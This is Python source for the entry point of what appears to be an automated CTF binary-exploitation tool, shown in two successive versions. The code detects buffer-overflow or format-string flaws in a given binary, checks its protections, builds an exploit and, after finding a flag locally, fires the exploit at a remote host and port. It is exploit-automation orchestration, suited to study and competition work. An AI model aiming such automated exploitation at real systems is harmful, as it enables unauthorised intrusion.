def main():
parser = argparse.ArgumentParser()
parser.add_argument('file',help="File to analyze")
parser.add_argument('-l','--libc',help="libc to use")
parser.add_argument('-u','--url',help="Remote URL to pwn",default="")
parser.add_argument('-p','--port',help="Remote port to pwn",default="0")
parser.add_argument('-v','--verbose',help="Verbose mode",action="store_true",default=False)
args = parser.parse_args()
if args.file is None:
print("[-] Exitting no file specified")
exit(1)
if args.verbose:
logging.disable(logging.CRITICAL)
#Detect problem type
properties = {}
properties['input_type'] = inputDetector.checkInputType(args.file)
properties['libc'] = args.libc
properties['file'] = args.file
print("[+] Checking pwn type...")
print("[+] Checking for overflow pwn type...")
properties['pwn_type'] = overflowDetector.checkOverflow(args.file,inputType=properties['input_type'])
if properties['pwn_type']['type'] is None:
print("[+] Checking for format string pwn type...")
properties['pwn_type'] = formatDetector.checkFormat(args.file,inputType=properties['input_type'])
#Get problem mitigations
print("[+] Getting binary protections")
properties['protections'] = protectionDetector.getProperties(args.file)
#Is it a leak based one?
if properties['pwn_type']['type'] == "Format":
print("[+] Checking for flag leak")
properties['pwn'] = formatLeak.checkLeak(args.file,properties)
#Launch leak remotely
if properties['pwn']['flag_found'] and args.url is not "":
print("[+] Found flag through leaks locally. Launching remote exploit")
print("[+] Connecting to {}:{}".format(args.url,args.port))
properties['pwn']['exploit'] = formatLeak.checkLeak(args.file,properties,remote_server=True,remote_url=args.url,port_num=int(args.port))
if properties['pwn']['flag_found']:
exit(0)
#Is there an easy win function
properties['win_functions'] = winFunctionDetector.getWinFunctions(args.file)
#Exploit overflows
if properties['pwn_type']['type'] == "Overflow":
print("[+] Exploiting overflow")
properties['pwn_type']['results'] = overflowExploiter.exploitOverflow(args.file, properties, inputType=properties['input_type'])
if properties['pwn_type']['results']['input']:
properties['send_results'] = overflowExploitSender.sendExploit(args.file,properties)
if properties['send_results']['flag_found'] and args.url is not "":
properties['remote_results'] = overflowExploitSender.sendExploit(args.file,properties,remote_server=True,remote_url=args.url,port_num=int(args.port))
elif properties['pwn_type']['type'] == "Format":
properties['pwn_type']['results'] = formatExploiter.exploitFormat(args.file,properties)
if properties['pwn_type'] is not None and 'flag_found' in properties['pwn_type'].keys() and properties['pwn_type']['results']['flag_found'] and args.url is not "":
properties['pwn_type']['send_results'] = formatExploiter.getRemoteFormat(properties,remote_url=args.url,remote_port=int(args.port))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('file', help="File to analyze")
parser.add_argument('-l', '--libc', help="libc to use")
parser.add_argument('-u', '--url', help="Remote URL to pwn", default="")
parser.add_argument('-p', '--port', help="Remote port to pwn", default="0")
parser.add_argument('-v', '--verbose', help="Verbose mode", action="store_true", default=False)
parser.add_argument('-m', '--maxpkt', help="Max packet size", default=None, type=int)
args = parser.parse_args()
if args.file is None:
print("[-] Exitting no file specified")
exit(1)
if args.verbose:
logging.disable(logging.CRITICAL)
# Detect problem type
properties = dict()
properties['libc'] = args.libc
properties['file'] = args.file
properties['input_type'] = inputDetector.checkInputType(args.file)
print("[+] Checking pwn type...")
print("[+] Checking for overflow pwn type...")
properties['pwn_type'] = overflowDetector.checkOverflow(args.file, args.maxpkt, inputType=properties['input_type'])
# Get problem mitigations
print("[+] Getting binary protections")
properties['protections'] = protectionDetector.getProperties(args.file)
# Is there an easy win function
properties['win_functions'] = winFunctionDetector.getWinFunctions(args.file)
# Exploit overflows
if properties['pwn_type']['type'] == "Overflow":
print("[+] Exploiting overflow")
properties['pwn_type']['results'] = overflowExploiter.exploitOverflow(args.file, properties,
inputType=properties['input_type'])
if 'input' in properties['pwn_type']['results'] and properties['pwn_type']['results']['input']:
properties['send_results'] = overflowExploitSender.sendExploit(args.file, properties)
if properties['send_results']['flag_found'] and args.url != "":
properties['remote_results'] = overflowExploitSender.sendExploit(args.file, properties,
remote_server=True,
remote_url=args.url,
port_num=int(args.port))
else:
print("[-] Can not determine vulnerable type")